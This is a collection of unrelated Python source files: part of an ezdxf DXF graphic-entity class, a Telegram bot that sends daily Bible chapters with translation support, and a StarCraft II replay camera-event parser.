source.move_to_layout(self, layout)
def copy_to_layout(self, layout: "BaseLayout") -> "DXFEntity":
"""
Copy entity to another `layout`, returns new created entity as
:class:`DXFEntity` object. Copying between different DXF drawings is
not supported.
Args:
layout: any layout (model space, paper space, block)
Raises:
DXFStructureError: for copying between different DXF drawings
"""
if self.doc != layout.doc:
raise DXFStructureError(
"Copying between different DXF drawings is not supported."
)
new_entity = self.copy()
layout.add_entity(new_entity)
return new_entity
def audit(self, auditor: "Auditor") -> None:
"""Audit and repair graphical DXF entities.
.. important::
Do not delete entities while auditing process, because this
would alter the entity database while iterating, instead use::
auditor.trash(entity)
to delete invalid entities after auditing automatically.
"""
assert self.doc is auditor.doc, "Auditor for different DXF document."
if not self.is_alive:
return
super().audit(auditor)
auditor.check_owner_exist(self)
dxf = self.dxf
if dxf.hasattr("layer"):
auditor.check_for_valid_layer_name(self)
if dxf.hasattr("linetype"):
auditor.check_entity_linetype(self)
if dxf.hasattr("color"):
auditor.check_entity_color_index(self)
if dxf.hasattr("lineweight"):
auditor.check_entity_lineweight(self)
if dxf.hasattr("extrusion"):
auditor.check_extrusion_vector(self)
def transform(self, m: "Matrix44") -> "DXFGraphic":
"""Inplace transformation interface, returns `self`
(floating interface).
Args:
m: 4x4 transformation matrix (:class:`ezdxf.math.Matrix44`)
"""
raise NotImplementedError()
def post_transform(self, m: "Matrix44") -> None:
"""Should be called if the main entity transformation was successful.
"""
if self.xdata is not None:
self.xdata.transform(m)
@property
def is_post_transform_required(self) -> bool:
"""Check if post transform call is required. """
return self.xdata is not None
def translate(self, dx: float, dy: float, dz: float) -> "DXFGraphic":
"""Translate entity inplace about `dx` in x-axis, `dy` in y-axis and
`dz` in z-axis, returns `self` (floating interface).
Basic implementation uses the :meth:`transform` interface, subclasses
may have faster implementations.
"""
return self.transform(Matrix44.translate(dx, dy, dz))
def scale(self, sx: float, sy: float, sz: float) -> "DXFGraphic":
"""Scale entity inplace about `dx` in x-axis, `dy` in y-axis and `dz`
in z-axis, returns `self` (floating interface).
"""
return self.transform(Matrix44.scale(sx, sy, sz))
def scale_uniform(self, s: float) -> "DXFGraphic":
"""Scale entity inplace uniform about `s` in x-axis, y-axis and z-axis,
returns `self` (floating interface).
"""
return self.transform(Matrix44.scale(s))
def rotate_axis(self, axis: "Vertex", angle: float) -> "DXFGraphic":
"""Rotate entity inplace about vector `axis`, returns `self`
(floating interface).
Args:
axis: rotation axis as tuple or :class:`Vec3`
angle: rotation angle in radians
"""
return self.transform(Matrix44.axis_rotate(axis, angle))
def rotate_x(self, angle: float) -> "DXFGraphic":
"""Rotate entity inplace about x-axis, returns `self`
(floating interface).
Args:
angle: rotation angle in radians
"""
return self.transform(Matrix44.x_rotate(angle))
def rotate_y(self, angle: float) -> "DXFGraphic":
"""Rotate entity inplace about y-axis, returns `self`
(floating interface).
Args:
angle: rotation angle in radians
"""
return self.transform(Matrix44.y_rotate(angle))
def rotate_z(self, angle: float) -> "DXFGraphic":
"""Rotate entity inplace about z-axis, returns `self`
(floating interface).
Args:
angle: rotation angle in radians
"""
return self.transform(Matrix44.z_rotate(angle))
def has_hyperlink(self) -> bool:
"""Returns ``True`` if entity has an attached hyperlink."""
return bool(self.xdata) and ("PE_URL" in self.xdata) # type: ignore
def set_hyperlink(
self, link: str, description: str = None, location: str = None
):
"""Set hyperlink of an entity."""
xdata = [(1001, "PE_URL"), (1000, str(link))]
if description:
xdata.append((1002, "{"))
xdata.append((1000, str(description)))
if location:
xdata.append((1000, str(location)))
xdata.append((1002, "}"))
self.discard_xdata("PE_URL")
self.set_xdata("PE_URL", xdata)
if self.doc and "PE_URL" not in self.doc.appids:
self.doc.appids.new("PE_URL")
return self
def get_hyperlink(self) -> Tuple[str, str, str]:
    """Return the attached hyperlink as a ``(link, description, location)``
    tuple; missing parts are empty strings.
    """
    fields = ["", "", ""]
    if self.xdata and "PE_URL" in self.xdata:
        strings = [
            tag.value
            for tag in self.get_xdata("PE_URL")
            if tag.code == 1000
        ]
        # first string is the link, then description, then location
        for index, value in enumerate(strings[:3]):
            fields[index] = value
    return fields[0], fields[1], fields[2]
def remove_dependencies(self, other: "Drawing" = None) -> None:
    """Remove all dependencies from current document.
    (internal API)

    `other` is the target document the entity will be moved into (may be
    ``None``); attributes holding handles into the old document's tables
    are discarded.
    """
    if not self.is_alive:
        return
    super().remove_dependencies(other)
    # The layer attribute is preserved because layer doesn't need a layer
    # table entry, the layer attributes are reset to default attributes
    # like color is 7 and linetype is CONTINUOUS
    has_linetype = other is not None and (
        self.dxf.linetype in other.linetypes
    )
    if not has_linetype:
        # linetype is not defined in the target document: fall back to BYLAYER
        self.dxf.linetype = "BYLAYER"
    # these attributes are handles into the source document's tables and
    # would dangle in the target document
    self.dxf.discard("material_handle")
    self.dxf.discard("visualstyle_handle")
    self.dxf.discard("plotstyle_enum")
    self.dxf.discard("plotstyle_handle")
def _new_compound_entity(
    self, type_: str, dxfattribs: dict
) -> "DXFGraphic":
    """Create and bind new entity with same layout settings as `self`.

    Used by INSERT & POLYLINE to create appended DXF entities, don't use it
    to create new standalone entities.
    (internal API)

    Args:
        type_: DXF type name of the new entity (e.g. "VERTEX", "ATTRIB")
        dxfattribs: DXF attributes for the new entity; may be ``None``
    """
    dxfattribs = dxfattribs or {}
    # if layer is not deliberately set, set same layer as creator entity,
    # at least VERTEX should have the same layer as the POLYGON entity.
    # Don't know if that is also important for the ATTRIB & INSERT entity.
    if "layer" not in dxfattribs:
        dxfattribs["layer"] = self.dxf.layer
    if self.doc:
        # bound to a document: store the new entity in the entity database
        entity = factory.create_db_entry(type_, dxfattribs, self.doc)
    else:
        # unbound entity (no document, no handle)
        entity = factory.new(type_, dxfattribs)
    # inherit ownership and space (model/paper) from the creator entity
    entity.dxf.owner = self.dxf.owner
    entity.dxf.paperspace = self.dxf.paperspace
    return entity  # type: ignore
@factory.register_entity
class SeqEnd(DXFGraphic):
    """SEQEND entity: terminator record that ends a sequence of appended
    entities (e.g. the VERTEX list of a POLYLINE or the ATTRIB list of an
    INSERT). Carries no data of its own beyond the generic graphic
    attributes.
    """
    DXFTYPE = "SEQEND"
def add_entity(entity: DXFGraphic, layout: "BaseLayout") -> None:
    """Add `entity` entity to the entity database and to the given `layout`."""
    # entity must be a fresh, unbound entity: no handle assigned yet
    assert entity.dxf.handle is None
    assert layout is not None
    if layout.doc:
        # bind to the layout's document: assigns a handle and stores the
        # entity in the document's entity database
        factory.bind(entity, layout.doc)
    layout.add_entity(entity)
def replace_entity(
    source: DXFGraphic, target: DXFGraphic, layout: "BaseLayout"
) -> None:
    """Add `target` entity to the entity database and to the given `layout`
    and replace the `source` entity by the `target` entity.

    The `target` takes over the handle of `source`, so references to the
    old entity resolve to the new one. If the layout has no document the
    `source` is destroyed instead.
    """
    # target must be a fresh, unbound entity: no handle assigned yet
    assert target.dxf.handle is None
    assert layout is not None
    target.dxf.handle = source.dxf.handle
    if source in layout:
        # remove the old entity from the layout before adding the new one
        layout.delete_entity(source)
        if layout.doc:
            factory.bind(target, layout.doc)
        layout.add_entity(target)
    else:
        # source is not part of the layout: nothing to replace, discard it
        source.destroy()
def is_graphic_entity(entity: DXFEntity) -> bool:
    """Returns ``True`` if the `entity` has a graphical representations and
    can reside in the model space, a paper space or a block layout,
    otherwise the entity is a table or class entry or a DXF object from the
    OBJECTS section.
    """
    return isinstance(entity, DXFGraphic) or (
        isinstance(entity, DXFTagStorage) and entity.is_graphic_entity
    )
|
"""
MIT License
Copyright (c) 2020 Camilo A. Cáceres
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import Bible
import Database_control
import telebot
from telebot import types
from difflib import SequenceMatcher
import numpy as np
from googletrans import Translator
import configparser
import time
import logging as log
########################################################################
######################     Constants          ######################
########################################################################
# Telegram TOKEN
# The token is read from config.txt, key `bot_token` in the DEFAULT section.
config = configparser.RawConfigParser()
config.read('config.txt')
TOKEN = dict(config.items('DEFAULT'))['bot_token']
#create a new Telegram Bot object
bot = telebot.TeleBot(TOKEN)
# command description used in the "help" command
# Maps command name (without the leading '/') -> human-readable description.
# Also drives the main reply keyboard, one row per command.
commands = {
    'start' : '☝ Know what can I do',
    'send_chapter' : '📧 Send now the chapter to read',
    'verse' : '⛪ Request a Bible passage',
    'information' : '📒 Know your information and settings for this bot',
    'help' : '❔ Gives you information about the available commands',
    'subscribe' : '📚 Receive 1 Bible chapter every day at a given time or Cancel it',
    'language' : '🌎 Select your preferred language',
    'choose_book' : '📖 Select the current bible book you are reading',
    'choose_chapter' : '📑 Select the current chapter you want to start reading',
    'bible_version' : '📕 Select the bible version'
}
########################################################################
######################     LANGUAGES          ######################
########################################################################
# Translator constructor
translator = Translator()
# Available Languages and Versions in the API.
# Each line of languages_api.txt looks like
#   "NNN <Language>: <Version Name> (<acronym>)"
# and the first 4 characters (a numeric prefix) are stripped.
# BUG FIX: both files were opened without ever being closed; use `with` so
# the handles are released deterministically.
with open("languages_api.txt", "r") as f:
    bible_api_list = [x[4:] for x in f]
# Map language -> list of available version names, preserving file order.
dict_api_version = {}
languages_api = []
for each_language in bible_api_list:
    language = each_language.split(":")[0]
    languages_api.append(language)
    dict_api_version[language] = []
acronyms_api = []
version_api = []
for each in bible_api_list:
    language = each.split(":")[0]
    # acronym is the text inside the last pair of parentheses
    acronym = each.split("(")[-1].split(")")[0]
    # version name is everything between ":" and the acronym (minus the
    # trailing separator character)
    version = each.split(":")[1].split(acronym)[0][:-1]
    acronyms_api.append(acronym)
    version_api.append(version)
    dict_api_version[language].append(version)
# Bidirectional lookup between full version names and acronyms.
dict_api_ver2acr = dict(zip(version_api, acronyms_api))
dict_api_acr2ver = dict(zip(acronyms_api, version_api))
unique_languages_api = set(languages_api)
# Available translation languages (one language name per line).
with open("language_translate.txt", "r") as f:
    languages_translation = [each.split("\n")[0] for each in f]
# Languages comparison:
# lang_ver_transl = languages with a native Bible version in the API,
# lang_transl     = languages only reachable through translation.
languages_translation_set = set(languages_translation)
lang_ver_transl = languages_translation_set.intersection(unique_languages_api)
lang_transl = languages_translation_set.difference(unique_languages_api)
########################################################################
################ SUPPORT FUNCTIONS ###################
########################################################################
def verify_language(language_input, lang_ver_transl=list(lang_ver_transl), lang_transl=list(lang_transl)):
    '''
    Return the supported language most similar to the user's input.

    The input is first translated to English (network call through
    googletrans), then compared with every supported language name using
    Bible.similar; the best-scoring name is returned.

    NOTE(review): the defaults are snapshots of the module-level sets taken
    once at definition time — later changes to those sets are not seen.
    '''
    similarity_vec=[]
    languages = lang_transl + lang_ver_transl
    language_input = translator.translate(language_input, dest='english').text
    for each in languages:
        similarity_vec.append(Bible.similar(language_input,each))
    # np.argmax returns the first best match on ties
    return languages[np.argmax(similarity_vec)]
def verify_version(version_input, versions=list(dict_api_ver2acr.keys())):
    '''
    Return the known Bible version name most similar to *version_input*.

    Similarity is scored with Bible.similar; the first best match wins.
    '''
    scores = [Bible.similar(version_input, candidate) for candidate in versions]
    return versions[np.argmax(scores)]
def send_translated_message(id, text, language="English"):
    '''
    Send *text* to chat *id*, translating it from English to *language*
    first unless the target language is already English.

    Errors (network failures, users who blocked the bot) are logged to
    stdout and swallowed on purpose: a failed delivery must not abort the
    caller's loop over many users.
    '''
    try:
        if language != "English":
            text = Bible.translate_message(text, language=language, src="English")
            # translation tends to insert a space after '/', which breaks
            # bot command links like '/help'
            text = text.replace("/ ","/")
        bot.send_message(id, text)
    except Exception:
        # BUG FIX: narrowed from a bare `except:` which also swallowed
        # SystemExit/KeyboardInterrupt.
        print("Connection Error")
        # DO NOT try to send the daily verse or any service if the user blocked the bot
        #send_translated_message(id, text, language)
########################################################################
################ ACTION FUNCTIONS ###################
########################################################################
# start page
@bot.message_handler(commands=['start'])
def command_start(m):
    """Handler for /start: register unknown users and send the intro text."""
    chat_id = m.chat.id
    user_name = m.chat.first_name
    connection, cursor = Database_control.create_db()
    if Database_control.verify_id(cursor, chat_id) == False:
        # first contact: create the user record with default settings
        Database_control.add_user(connection, cursor, chat_id, user_name)
    language = Database_control.get_language(cursor, chat_id)
    Database_control.close_db(connection)
    start_text="☝ This bot is a free service for educational purposes \nThis bot 🤖 can: \n\t1. Send you daily 1 chapter of the Bible in a sequence ('/subscribe') \n\t2. If you are not subscribed or want to advance more, you can manually request the chapter ('/send_chapter'). \n\t3.❓ Also you can ask for any verse or passage ('/verse') \n\nGo to help ('/help') for more information"
    send_translated_message(m.chat.id, start_text, language)  # send the intro text
    show_mainkeyboard(m)
# send_chapter page
@bot.message_handler(commands=['send_chapter'])
def command_send_chapter(m):
    """Handler for /send_chapter: send the user's current chapter and
    advance the stored bookmark to the next chapter.
    """
    id = m.chat.id
    connection, cursor = Database_control.create_db()
    book = Database_control.get_book(cursor, id)
    origin_language = Database_control.get_language(cursor, id)
    chapter = Database_control.get_chapter(cursor, id)
    bible_version = Database_control.get_bible_version(cursor, id)
    language = Database_control.get_language(cursor, id)
    verify_id = Database_control.verify_id(cursor, id)
    if verify_id:
        send_translated_message(id, "Sending chapter ...", language)
        message = " ".join([book, str(chapter)])
        # BUG FIX: n_message was assigned only inside `try`; if the
        # translation raised, the send below hit a NameError. Initialize it
        # with the untranslated reference first.
        n_message = message
        try:
            if origin_language in lang_ver_transl:
                # native version available: request the reference as-is
                response = Bible.get_message(n_message, bible_version)
            else:
                # translate the reference to English, fetch, translate back
                n_message = Bible.translate_message(message, language="English", src=origin_language)
                response = Bible.get_message(n_message, bible_version)
                response = Bible.translate_message(response, origin_language)
        except Exception:  # narrowed from a bare except
            response = "Error - please retry"
        send_translated_message(id, n_message, language)
        # Telegram limits message size, so send the chapter in chunks
        for each_message in telebot.util.split_string(response, 3000):
            send_translated_message(id, each_message, language)
        # advance the bookmark to the next chapter
        next_chapter = Bible.get_next_chapter(message)
        next_book = next_chapter.split(" ")[0]
        next_chapter = next_chapter.split(" ")[1]
        Database_control.set_book(connection, cursor, next_book, id)
        Database_control.set_chapter(connection, cursor, next_chapter, id)
        Database_control.set_mod_default(connection, cursor, id)
        Database_control.close_db(connection)
        show_mainkeyboard(m)
    else:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        Database_control.close_db(connection)
        command_start(m)
def command_send_chapter_crontab(id):
    """Send the daily chapter to user *id* and advance the bookmark.

    Same flow as command_send_chapter, but driven by the scheduler instead
    of a Telegram command, so there is no Message object and no keyboard
    refresh, and the user is assumed to exist.
    """
    connection, cursor = Database_control.create_db()
    book = Database_control.get_book(cursor, id)
    origin_language = Database_control.get_language(cursor, id)
    chapter = Database_control.get_chapter(cursor, id)
    bible_version = Database_control.get_bible_version(cursor, id)
    language = Database_control.get_language(cursor, id)
    send_translated_message(id, "Sending daily chapter", language)
    message = " ".join([book, str(chapter)])
    # BUG FIX: n_message was assigned only inside `try`; if the translation
    # raised, the send below hit a NameError. Initialize it first.
    n_message = message
    try:
        if origin_language in lang_ver_transl:
            # native version available: request the reference as-is
            response = Bible.get_message(n_message, bible_version)
        else:
            # translate the reference to English, fetch, translate back
            n_message = Bible.translate_message(message, language="English", src=origin_language)
            response = Bible.get_message(n_message, bible_version)
            response = Bible.translate_message(response, origin_language)
    except Exception:  # narrowed from a bare except
        response = "Error - please retry"
    send_translated_message(id, n_message, language)
    # Telegram limits message size, so send the chapter in chunks
    for each_message in telebot.util.split_string(response, 3000):
        send_translated_message(id, each_message, language)
    # advance the bookmark to the next chapter
    next_chapter = Bible.get_next_chapter(message)
    next_book = next_chapter.split(" ")[0]
    next_chapter = next_chapter.split(" ")[1]
    Database_control.set_book(connection, cursor, next_book, id)
    Database_control.set_chapter(connection, cursor, next_chapter, id)
    Database_control.set_mod_default(connection, cursor, id)
    Database_control.close_db(connection)
# set verse page
@bot.message_handler(commands=['verse'])
def command_verse(m):
    """Handler for /verse: switch the user into passage-request mode."""
    command_hide(m)
    chat_id = m.chat.id
    connection, cursor = Database_control.create_db()
    Database_control.set_verse(connection, cursor, chat_id)
    language = Database_control.get_language(cursor, chat_id)
    known_user = Database_control.verify_id(cursor, chat_id)
    Database_control.close_db(connection)
    if not known_user:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        command_start(m)
        return
    send_translated_message(chat_id, "Type the desired passage", language)
    example_text = "Examples: \nJohn 14:6 \nGenesis 2:1-4 \nLuke 3"
    send_translated_message(chat_id, example_text, language)
# information page
@bot.message_handler(commands=['information'])
def command_information(m):
    """Handler for /information: show subscription status and the user's
    current reading settings (language, book, chapter, version).
    """
    id = m.chat.id
    connection, cursor = Database_control.create_db()
    status = Database_control.get_status(cursor, id)
    language = Database_control.get_language(cursor, id)
    book = Database_control.get_book(cursor, id)
    chapter = Database_control.get_chapter(cursor, id)
    bible_version = Database_control.get_bible_version(cursor, id)
    verify_id = Database_control.verify_id(cursor, id)
    Database_control.close_db(connection)
    if verify_id:
        # Show the full version name when the acronym is known; this
        # replaces a bare try/except that silently swallowed everything.
        bible_version = dict_api_acr2ver.get(bible_version, bible_version)
        status = '✅' if status == 1 else '❌'
        info_text = "📒 Information \n📚 Subscribed: \t"+status+"\n🌎 Language: \t"+str(language)+"\n📖 Current Bible Book: \t"+str(book)+"\n📑 Current Chapter: \t"+str(chapter)+"\n📕 Current Bible Version: \t"+str(bible_version)
        send_translated_message(m.chat.id, info_text, language) # Send info text
        show_mainkeyboard(m)
    else:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        command_start(m)
# help page
@bot.message_handler(commands=['help'])
def command_help(m):
    """Handler for /help: send the command list built from `commands`."""
    id = m.chat.id
    connection, cursor = Database_control.create_db()
    language = Database_control.get_language(cursor, id)
    verify_id = Database_control.verify_id(cursor, id)
    Database_control.close_db(connection)
    if verify_id:
        # BUG FIX: user-facing typo "Avaliable" -> "Available"
        help_text = "Available commands: \n\n"
        # generate help text out of the commands dictionary defined at the top
        for key, description in commands.items():
            help_text += "/" + key + ": " + description + "\n"
        send_translated_message(id, help_text, language)  # send the generated help page
        show_mainkeyboard(m)
    else:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        command_start(m)
def show_mainkeyboard(m):
    """Show the persistent reply keyboard: one row per bot command plus a
    final /hide_keyboard row.
    """
    start_markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=False)
    # idiom fix: iterate the dict directly instead of range(len(list(...)))
    for command in commands:
        start_markup.row("/" + command)
    start_markup.row("/hide_keyboard")
    bot.send_message(m.from_user.id, "⌨️❔", reply_markup=start_markup)
# Hide keyboard
@bot.message_handler(commands=['hide_keyboard'])
def command_hide(message):
    """Handler for /hide_keyboard: remove the custom reply keyboard."""
    # bot.send_chat_action(id, 'typing')
    hide_markup = telebot.types.ReplyKeyboardRemove()
    bot.send_message(message.chat.id, "⌨💤...", reply_markup=hide_markup)
# subscribe/ unsubscribe
@bot.message_handler(commands=['subscribe'])
def command_subscribe(m):
    """Handler for /subscribe: toggle the daily-chapter subscription."""
    chat_id = m.chat.id
    connection, cursor = Database_control.create_db()
    current_status = Database_control.get_status(cursor, chat_id)
    if Database_control.verify_id(cursor, chat_id):
        # flip the subscription flag
        new_status = 0 if current_status == 1 else 1
        Database_control.set_status(connection, cursor, new_status, chat_id)
        language = Database_control.get_language(cursor, chat_id)
        Database_control.close_db(connection)
        status_icon = '✅' if new_status == 1 else '❌'
        send_translated_message(chat_id, "Subscription: \t" + status_icon, language)
    else:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        Database_control.close_db(connection)
        command_start(m)
# set language page
@bot.message_handler(commands=['language'])
def command_language(m):
    """Handler for /language: switch the user into language-selection mode."""
    command_hide(m)
    chat_id = m.chat.id
    connection, cursor = Database_control.create_db()
    Database_control.set_mod_language(connection, cursor, chat_id)
    language = Database_control.get_language(cursor, chat_id)
    known_user = Database_control.verify_id(cursor, chat_id)
    Database_control.close_db(connection)
    if not known_user:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        command_start(m)
        return
    send_translated_message(chat_id, "Type your new language", language)
# set book page
@bot.message_handler(commands=['choose_book'])
def command_book(m):
    """Handler for /choose_book: switch the user into book-selection mode."""
    command_hide(m)
    chat_id = m.chat.id
    connection, cursor = Database_control.create_db()
    Database_control.set_mod_book(connection, cursor, chat_id)
    language = Database_control.get_language(cursor, chat_id)
    known_user = Database_control.verify_id(cursor, chat_id)
    Database_control.close_db(connection)
    if not known_user:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        command_start(m)
        return
    send_translated_message(chat_id, "Type the desired bible book", language)
# set current chapter
@bot.message_handler(commands=['choose_chapter'])
def command_chapter(m):
    """Handler for /choose_chapter: switch the user into chapter-selection mode."""
    command_hide(m)
    chat_id = m.chat.id
    connection, cursor = Database_control.create_db()
    Database_control.set_mod_chapter(connection, cursor, chat_id)
    language = Database_control.get_language(cursor, chat_id)
    known_user = Database_control.verify_id(cursor, chat_id)
    Database_control.close_db(connection)
    if not known_user:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        command_start(m)
        return
    send_translated_message(chat_id, "Type the number of the desired chapter to start with", language)
@bot.message_handler(commands=['bible_version'])
def command_bible_version(m):
    """Handler for /bible_version: offer a keyboard with the Bible versions
    available for the user's language (plus the English versions).
    """
    command_hide(m)
    id = m.chat.id
    connection, cursor = Database_control.create_db()
    Database_control.set_mod_bible_version(connection, cursor, id)
    language = Database_control.get_language(cursor, id)
    verify_id = Database_control.verify_id(cursor, id)
    if verify_id:
        if language in dict_api_version:
            versions = dict_api_version[language] + dict_api_version["English"]
        else:
            versions = dict_api_version["English"]
        version_markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=False)
        # idiom fix: iterate the list directly instead of range(len(...))
        for version in versions:
            version_markup.row(version)
        Database_control.set_mod_default(connection, cursor, id)
        Database_control.set_mod_bible_version(connection, cursor, id)
        Database_control.close_db(connection)
        bot.send_message(m.from_user.id, "⌨️", reply_markup=version_markup)
    else:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        Database_control.close_db(connection)
        command_start(m)
# default handler for every other text
@bot.message_handler(func=lambda message: True, content_types=['text'])
def command_default(m):
    """Fallback handler for free text.

    The bot is a state machine: the DB mod-flags (mod_language, mod_book,
    mod_chapter, mod_bible_version, verse) record what the previous command
    asked the user to type, and this handler interprets the incoming text
    according to whichever flag is set.
    """
    id = m.chat.id
    connection, cursor = Database_control.create_db()
    if Database_control.verify_id(cursor, id) == False:
        send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
        Database_control.close_db(connection)
        command_start(m)
    else:
        # TODO - put all in a tuple instead single queries - optimize db queries
        lang_selection = Database_control.get_mod_language(cursor, id)
        bible_book_selection = Database_control.get_mod_book(cursor, id)
        chapter_selection = Database_control.get_mod_chapter(cursor, id)
        bible_version_selection = Database_control.get_mod_bible_version(cursor, id)
        verse = Database_control.get_verse(cursor, id)
        origin_language = Database_control.get_language(cursor, id)
        bible_version = Database_control.get_bible_version(cursor, id)
        if lang_selection == True:
            # user was asked for a language: fuzzy-match and store it,
            # switching the stored Bible version to one native to that
            # language (or the English 'akjv' fallback)
            language = verify_language(m.text)
            Database_control.set_language(connection, cursor, language, id)
            Database_control.set_mod_language(connection, cursor, id)
            if language in dict_api_version.keys():
                Database_control.set_bible_version(connection, cursor, dict_api_ver2acr[dict_api_version[language][0]], id)
            else:
                Database_control.set_bible_version(connection, cursor, 'akjv', id)
            send_translated_message(m.chat.id, "The selected language is "+ language, origin_language)
            Database_control.set_mod_default(connection, cursor, id)
            Database_control.close_db(connection)
            show_mainkeyboard(m)
        elif verse == True:
            # user was asked for a passage reference (e.g. "John 14:6")
            send_translated_message(id, "Accepted request - Searching ...", origin_language)
            message = m.text
            try:
                if origin_language in lang_ver_transl:
                    if origin_language != 'English':
                        n_message = Bible.translate_message(message, language="English", src=origin_language)
                    else:
                        n_message = message
                    # drop a stray space after ':' (e.g. "John 14: 6")
                    if n_message.split(":")[-1][0] == " ":
                        n_message = "".join([n_message.split(":")[:-1][0],":","".join(n_message.split(":")[-1][1:].split(" "))])
                    response = Bible.get_message(n_message, bible_version)
                else:
                    n_message = Bible.translate_message(message, language="English", src=origin_language)
                    if n_message.split(":")[-1][0] == " ":
                        n_message = "".join([n_message.split(":")[:-1][0],":","".join(n_message.split(":")[-1][1:].split(" "))])
                    response = Bible.get_message(n_message, bible_version)
                    response = Bible.translate_message(response, origin_language)
                Database_control.set_verse(connection, cursor, id)
            except:
                response = "Error - please retry"
            # Telegram message size limit: send in chunks
            response = [i for i in telebot.util.split_string(response, 3000)]
            for each_message in response:
                send_translated_message(id, each_message, origin_language)
            Database_control.set_mod_default(connection, cursor, id)
            Database_control.close_db(connection)
            show_mainkeyboard(m)
        elif bible_book_selection == True:
            # user was asked for a Bible book name
            message = m.text
            command_hide(m)
            if origin_language in (list(lang_ver_transl)+list(lang_transl)):
                if origin_language != 'English':
                    n_message = Bible.translate_message(message, language="English", src=origin_language)
                else:
                    n_message = message
                book = Bible.verify_book(n_message)
            else:
                send_translated_message(m.chat.id, "As your language is not available, please write in English", origin_language)
                n_message = message
                book = Bible.verify_book(n_message)
            Database_control.set_book(connection, cursor, book, id)
            Database_control.set_mod_book(connection, cursor, id)
            Database_control.set_mod_default(connection, cursor, id)
            send_translated_message(m.chat.id, "The selected Book is "+ book, origin_language)
            Database_control.close_db(connection)
            show_mainkeyboard(m)
        elif chapter_selection == True:
            # user was asked for a chapter number; invalid input falls back
            # to chapter 1
            message = m.text
            book = Database_control.get_book(cursor, id)
            if message.isnumeric():
                if (Bible.verify_book_chapter(book, message) == True) and (int(message) >= 1):
                    Database_control.set_chapter(connection, cursor, message, id)
                    send_translated_message(m.chat.id, "The selected chapter is "+ message, origin_language)
                else:
                    send_translated_message(m.chat.id, "This chapter doesn't exist for the book of "+book+". \nChapter 1 selected.", origin_language)
                    message = "1"
                    Database_control.set_chapter(connection, cursor, "1", id)
            else:
                message = "1"
                send_translated_message(m.chat.id, "This is not a number. \nChapter 1 selected.", origin_language)
                Database_control.set_chapter(connection, cursor, "1", id)
            Database_control.set_mod_book(connection, cursor, id)
            Database_control.set_mod_default(connection, cursor, id)
            Database_control.close_db(connection)
            show_mainkeyboard(m)
        elif bible_version_selection == True:
            # user picked a Bible version from the keyboard
            message = m.text
            command_hide(m)
            version = verify_version(message)
            acr = dict_api_ver2acr[version]
            Database_control.set_bible_version(connection, cursor, acr, id)
            Database_control.set_mod_default(connection, cursor, id)
            Database_control.close_db(connection)
            show_mainkeyboard(m)
        else:
            # no mode flag set: unrecognized free text
            send_translated_message(m.chat.id, "I don't understand. \nTry the help page at '/help'", origin_language)
            Database_control.set_mod_default(connection, cursor, id)
            Database_control.close_db(connection)
            show_mainkeyboard(m)
        # NOTE(review): every branch above already closed the connection, so
        # this looks like a redundant second close — confirm Database_control
        # tolerates closing twice.
        Database_control.close_db(connection)
########################################################################
################         MAIN FUNCTION            ##################
########################################################################
#telebot.apihelper.READ_TIMEOUT = 1
if __name__ == "__main__":
    # bot.polling(none_stop=True, timeout=30)
    # Restart loop: long polling occasionally dies on network errors, so
    # log the failure, stop polling cleanly, back off, and poll again.
    while True:
        try:
            log.info('Starting bot')
            bot.polling(none_stop=True, timeout=30)
        except Exception as err:
            log.error("Bot polling error: {0}".format(err.args))
            bot.stop_polling()
            # back off for a minute before reconnecting
            time.sleep(60)
|
from zephyrus_sc2_parser.events.base_event import BaseEvent
from zephyrus_sc2_parser.game.perception_action_cycle import PerceptionActionCycle
class CameraUpdateEvent(BaseEvent):
    """Parses camera-update replay events: records screen changes and
    groups camera activity into Perception-Action Cycles (PACs)."""

    def __init__(self, *args):
        super().__init__(*args)

    def parse_event(self):
        """Update the acting player's screen list and PAC state from one
        camera-update event."""
        if not self.event['m_target']:
            return
        player = self.player
        if not player:
            return
        target = self.event['m_target']
        position = (target['x'] / 256, target['y'] / 256)
        gameloop = self.event['_gameloop']
        if not player.prev_screen_position:
            player.prev_screen_position = position
        else:
            x_diff = player.prev_screen_position[0] - position[0]
            y_diff = player.prev_screen_position[1] - position[1]
            # if x^2 + y^2 > 15^2 then add screen
            # 15 tiles is cut off
            if (x_diff ** 2) + (y_diff ** 2) >= 225:
                player.screens.append(gameloop)
                player.prev_screen_position = position
        current_pac = player.current_pac
        if current_pac and current_pac.check_position(position):
            # still within the current PAC's camera bounds: count the move
            current_pac.camera_moves.append((gameloop, position))
            return
        if current_pac:
            # camera left the PAC's bounds; keep the PAC only if it met the
            # minimum duration and contained at least one action
            if current_pac.check_duration(gameloop):
                current_pac.final_camera_position = position
                current_pac.final_gameloop = gameloop
                if current_pac.actions:
                    player.pac_list.append(current_pac)
        # in every remaining case a fresh PAC starts at this position
        player.current_pac = PerceptionActionCycle(position, gameloop)
        player.current_pac.camera_moves.append((gameloop, position))
|
import pandas as pd
